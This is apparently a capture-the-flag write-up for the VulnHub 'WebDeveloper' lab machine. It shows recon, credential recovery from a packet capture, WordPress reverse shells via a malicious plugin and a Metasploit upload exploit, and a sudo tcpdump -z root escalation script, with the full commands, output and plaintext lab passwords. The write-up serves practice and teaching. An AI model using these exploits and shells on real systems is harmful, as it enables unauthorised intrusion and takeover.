BACK
root@kalilinux:~/Documents/VulnHub/WebDeveloper#
root@kalilinux:~/Documents/VulnHub/WebDeveloper#
root@kalilinux:~/Documents/VulnHub/WebDeveloper#
webdeveloper@webdeveloper:~$
_ _ _ _ ____ _
| | | |___| |_| \ ___ _ _ ___| |___ ___ ___ ___
| | | | -_| . | | | -_| | | -_| | . | . | -_| _|
|_____|___|___|____/|___|\_/|___|_|___| _|___|_|
|_|
Target IP: 10.0.2.6
by sc00by
##########
NMAP Scan:
##########
root@kalilinux:~/Documents/VulnHub/WebDeveloper# nmap -sT -p- 10.0.2.6
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-20 13:16 CDT
Nmap scan report for 10.0.2.6
Host is up (0.0016s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:CC:54:C9 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 11.18 seconds
[~!~] A web server running on the box named "WebDeveloper"
...seems appropriate!
###########
Web Server:
###########
#######################
Mapping the Web server:
#######################
[~!~] I hadn't run a typical dirbuster yet so
I devided to see if there were any interesting
files on the web server.
root@kalilinux:~/Documents/VulnHub/WebDeveloper# dirbuster
Starting OWASP DirBuster 1.0-RC1
Starting dir/file list based brute forcing
Dir found: /.hta/ - 403
Dir found: /.htaccess/ - 403
Dir found: /.htpasswd/ - 403
Dir found: / - 200
Dir found: /index.php/ - 301
Dir found: /index.php/2018/ - 200
Dir found: /index.php/2018/10/ - 200
Dir found: /index.php/2018/10/30/ - 200
Dir found: /index.php/2018/10/30/hello-world/ - 200
Dir found: /index.php/category/uncategorized/ - 200
File found: /wp-login.php - 200
Dir found: /index.php/feed/ - 200
Dir found: /index.php/comments/feed/ - 200
Dir found: /wp-content/ - 200
Dir found: /wp-content/themes/ - 200
Dir found: /wp-content/themes/twentyseventeen/ - 500
Dir found: /wp-content/themes/twentyseventeen/assets/ - 200
Dir found: /wp-content/themes/twentyseventeen/assets/images/ - 200
Dir found: /wp-includes/ - 200
Dir found: /wp-includes/js/ - 200
Dir found: /wp-includes/js/jquery/ - 200
File found: /wp-includes/js/jquery/jquery.js - 200
File found: /wp-includes/js/jquery/jquery-migrate.min.js - 200
Dir found: /wp-content/themes/twentyseventeen/assets/js/ - 200
File found: /wp-content/themes/twentyseventeen/assets/js/skip-link-focus-fix.js - 200
Dir found: /wp-content/themes/twentyseventeen/assets/css/ - 200
Dir found: /icons/ - 403
File found: /wp-content/themes/twentyseventeen/assets/js/global.js - 200
File found: /wp-content/themes/twentyseventeen/assets/js/jquery.scrollTo.js - 200
File found: /wp-content/themes/twentyseventeen/assets/images/svg-icons.svg - 200
File found: /wp-includes/js/wp-embed.min.js - 200
File found: /wp-includes/js/jquery/jquery-migrate.js - 200
File found: /wp-includes/js/jquery/jquery.color.min.js - 200
File found: /wp-includes/js/jquery/jquery.form.js - 200
File found: /wp-content/themes/twentyseventeen/assets/js/customize-controls.js - 200
File found: /wp-includes/js/jquery/jquery.form.min.js - 200
Dir found: /ipdata/ - 200
File found: /wp-content/themes/twentyseventeen/assets/css/colors-dark.css - 200
File found: /wp-content/themes/twentyseventeen/assets/js/customize-preview.js - 200
File found: /wp-includes/js/jquery/jquery.hotkeys.js - 200
File found: /wp-content/themes/twentyseventeen/assets/css/editor-style.css - 200
File found: /wp-content/themes/twentyseventeen/assets/js/html5.js - 200
File found: /wp-includes/js/jquery/jquery.hotkeys.min.js - 200
File found: /wp-content/themes/twentyseventeen/assets/css/ie8.css - 200
File found: /wp-content/themes/twentyseventeen/assets/js/navigation.js - 200
File found: /wp-content/themes/twentyseventeen/assets/css/ie9.css - 200
File found: /wp-includes/js/jquery/jquery.masonry.min.js - 200
File found: /wp-includes/js/jquery/jquery.query.js - 200
File found: /wp-includes/js/jquery/jquery.schedule.js - 200
File found: /wp-includes/js/jquery/jquery.serialize-object.js - 200
File found: /wp-includes/js/jquery/jquery.table-hotkeys.js - 200
File found: /wp-includes/js/jquery/jquery.table-hotkeys.min.js - 200
File found: /wp-includes/js/jquery/jquery.ui.touch-punch.js - 200
File found: /wp-includes/js/jquery/suggest.js - 200
File found: /wp-includes/js/jquery/suggest.min.js - 200
Dir found: /wp-includes/js/jquery/ui/ - 200
File found: /ipdata/analyze.cap - 200
Dir found: /server-status/ - 403
Dir found: /wp-admin/ - 302
Dir found: /xmlrpc.php/ - 405
DirBuster Stopped
[~!~] Indeed, an interesting file HAS
been found:
/ipdata/analyze.cap
A packet capture file! We can assess
this in wireshark.
###################
Wireshark Analysis:
###################
root@kalilinux:~/Documents/VulnHub/WebDeveloper# wget http://10.0.2.6/ipdata/analyze.cap
--2019-04-21 10:58:04-- http://10.0.2.6/ipdata/analyze.cap
Connecting to 10.0.2.6:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2977836 (2.8M) [application/vnd.tcpdump.pcap]
Saving to: ‘analyze.cap’
analyze.cap 100%[======================>] 2.84M --.-KB/s in 0.1s
2019-04-21 10:58:04 (22.8 MB/s) - ‘analyze.cap’ saved [2977836/2977836]
root@kalilinux:~/Documents/VulnHub/WebDeveloper# ls
analyze.cap index.html
root@kalilinux:~/Documents/VulnHub/WebDeveloper# file analyze.cap
analyze.cap: pcap capture file, microsecond ts (little-endian) - version 2.4 (Ethernet, capture length 262144)
[~!~] Now we target it with WireShark!
root@kalilinux:~/Documents/VulnHub/WebDeveloper# wireshark analyze.cap
[~!~] I found a couple of interesting looking cookies
to play with.
[~!~] And then we just hit the motherlode:
We get some credentials:
[~!~] And then we just hit the motherlode:
We get some credentials:
USER: webdeveloper
PASS: Te5eQg&4sBS!Yr$)wf%(DcAd
#####################
Reverse Shell Take 1:
#####################
[~!~] I went ahead and checked out the plugins,
since I had done a malicious plugin on
a different VulnHub box in the past.
There is a malicious plugin generator here:
https://github.com/wetw0rk/malicious-wordpress-plugin
root@kalilinux:~/tools/wordpress/malicious-wordpress-plugin# python wordpwn.py 10.0.2.15 7172 Y
[*] Checking if msfvenom installed
[+] msfvenom installed
[+] Generating plugin script
[+] Writing plugin script to file
[+] Generating payload To file
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 1503 (iteration=0)
php/base64 chosen with final size 1503
Payload size: 1503 bytes
[+] Writing files to zip
[+] Cleaning up files
[+] General Execution Location: http://(target)/wp-content/plugins/malicous/
[+] General Upload Location: http://(target)/wp-admin/plugin-install.php?tab=upload
[+] Launching handler
[ ok ] Starting postgresql (via systemctl): postgresql.service.
[-] ***rting the Metasploit Framework console...|
[-] * WARNING: No database support: No database YAML file
[-] ***
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
=[ metasploit v5.0.16-dev ]
+ -- --=[ 1876 exploits - 1061 auxiliary - 328 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
[*] Processing wordpress.rc for ERB directives.
resource (wordpress.rc)> use exploit/multi/handler
resource (wordpress.rc)> set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
resource (wordpress.rc)> set LHOST 10.0.2.15
LHOST => 10.0.2.15
resource (wordpress.rc)> set LPORT 7172
LPORT => 7172
resource (wordpress.rc)> exploit
[*] Started reverse TCP handler on 10.0.2.15:7172
[~!~] So now we should have a reverse shell handler.
Alongside of that wordpwn gives you a malicious.zip
to upload.
root@kalilinux:~/Documents/VulnHub/WebDeveloper# ls -la ~/tools/wordpress/malicious-wordpress-plugin/malicous.zip
-rw-r--r-- 1 root root 1885 Apr 21 11:49 /root/tools/wordpress/malicious-wordpress-plugin/malicous.zip
[~!~] It was at this point that this reverse shell had failed me :[
There was still hope for one yet!
There's another method...
#####################
Reverse Shell Take 2:
#####################
[~!~] The reverse shell I used for HackInOS:1, can
actually be applied straight to a config within
our user panel!
Source:
-------
http://pentestmonkey.net/tools/php-reverse-shell
Then, we can paste our shell into the
Appearance -> Editor section!
Then we just need to start a listener:
root@kalilinux:~/Documents/VulnHub/WebDeveloper#
Then we just need to start a listener:
nc -lvp 7172
listening on [any] 7172 ...
[~!~] Aaaaaaaaand nothing. Another failed attempt at
a reverse shell, but ALAS I found one more way
to attempt to gain a shell from wordpress!
#####################
Reverse Shell Take 3:
#####################
[~!~] This one uses a metasploit module that attempts
to pivot off of a plugin yet again.
root@kalilinux:~/Documents/VulnHub/WebDeveloper# msfconsole
[-] ***rTing the Metasploit Framework console...|
[-] * WARNING: No database support: No database YAML file
[-] ***
____________
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%| `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
[% .--------..-----.| |_ .---.-.| .,a$%|.-----.| |.-----.|__|| |_ %%]
[% | || -__|| _|| _ || ,,aS$""` || _ || || _ || || _|%%]
[% |__|__|__||_____||____||___._||%$P"` || __||__||_____||__||____|%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a, ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% `"$ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
=[ metasploit v5.0.16-dev ]
+ -- --=[ 1876 exploits - 1061 auxiliary - 328 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
msf5 > search reflex
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 exploit/unix/webapp/wp_reflexgallery_file_upload 2012-12-30 excellent Yes Wordpress Reflex Gallery Upload Vulnerability
msf5 > use exploit/unix/webapp/wp_reflexgallery_file_upload
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > show options
Module options (exploit/unix/webapp/wp_reflexgallery_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Reflex Gallery 3.1.3
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) >
[~!~] Then I made sure to have the following plugins.
[~!~] Now we'll just set our options and attempt
to get our reverse shell hopefully :D
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) >
[~!~] Now we'll just set our options and attempt
to get our reverse shell hopefully :D
set RHOSTS 10.0.2.6
RHOSTS => 10.0.2.6
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > exploit
[*] Started reverse TCP handler on 10.0.2.15:4444
[+] Our payload is at: jLuivOgatUrX.php. Calling payload...
[*] Calling payload...
[*] Sending stage (38247 bytes) to 10.0.2.6
[*] Meterpreter session 1 opened (10.0.2.15:4444 -> 10.0.2.6:42074) at 2019-04-21 14:24:30 -0500
[+] Deleted jLuivOgatUrX.php
meterpreter > shell
Process 1417 created.
Channel 0 created.
whoami
www-data
[~!~] FINALLY WE GOT OUR REVERSE SHELL!!
Albeit an ugly one xD
Sometimes persistance is key.
############################
Searching the Web Directory:
############################
[~!~] The database config file:
wp-config.php
find / -name wp-config.php 2>/dev/null
/var/www/html/wp-config.php
[~!~] This was found within /var/www/html/wp-config.php
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'webdeveloper');
/** MySQL database password */
define('DB_PASSWORD', 'MasterOfTheUniverse');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
[~!~] Some creds, (possibly ssh?):
DB_USER: webdeveloper
DB_PASSWORD: MasterOfTheUniverse
#######
SSH in:
#######
root@kalilinux:~/Documents/VulnHub/WebDeveloper# ssh webdeveloper@10.0.2.6
The authenticity of host '10.0.2.6 (10.0.2.6)' can't be established.
ECDSA key fingerprint is SHA256:qgNlWWIX9wv+iLg9Bqpq+ENCHqG3lhlsM1bMQJygYDM.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.0.2.6' (ECDSA) to the list of known hosts.
webdeveloper@10.0.2.6's password:
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-47-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Apr 21 19:41:02 UTC 2019
System load: 0.0 Processes: 107
Usage of /: 25.9% of 19.56GB Users logged in: 0
Memory usage: 45% IP address for eth0: 10.0.2.6
Swap usage: 0%
=> There is 1 zombie process.
* Ubuntu's Kubernetes 1.14 distributions can bypass Docker and use containerd
directly, see https://bit.ly/ubuntu-containerd or try it now with
snap install microk8s --classic
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
105 packages can be updated.
4 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Oct 30 09:25:27 2018 from 192.168.1.114
webdeveloper@webdeveloper:~$
[~!~] We have an ssh session on the box as webdeveloper now!
###########
On the box:
###########
webdeveloper@webdeveloper:~$ sudo -l
[sudo] password for webdeveloper:
Matching Defaults entries for webdeveloper on webdeveloper:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User webdeveloper may run the following commands on webdeveloper:
(root) /usr/sbin/tcpdump
webdeveloper@webdeveloper:~$
[~!~] This should be a quick pivot to root!
We can execute tcpdump as root without
sudo password!
I believe I have used this pivot before
in my TempleOfDoom writeup.
Several hours later...
[~!~] The method for this tcpdump pivot was NOT
the same idea as the TempleOfDoom one.
Here is the method:
STEP 1
======
SSH Session 1:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
webdeveloper@webdeveloper:~$ pico mk_exploit.sh
webdeveloper@webdeveloper:~$ chmod +x mk_exploit.sh
webdeveloper@webdeveloper:~$ cat mk_exploit.sh
#!/bin/bash
cd /tmp
COMMAND='cat /root/flag.txt'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
webdeveloper@webdeveloper:~$ ./mk_exploit.sh
tcpdump: listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Step 2
======
SSH Session 2:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
webdeveloper@webdeveloper:~$ nc -v -z -n -w 1 127.0.0.1 7172
nc: connect to 127.0.0.1 port 7172 (tcp) failed: Connection refused
webdeveloper@webdeveloper:~$
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Step 3
======
SSH Session 1:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
webdeveloper@webdeveloper:~$ Congratulations here is youre flag:
cba045a5a4f26f1cd8d7be9a5c2b1b34f6c5d290
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[~!~] And there's the root flag!!!
cba045a5a4f26f1cd8d7be9a5c2b1b34f6c5d290
~sc00by
BACK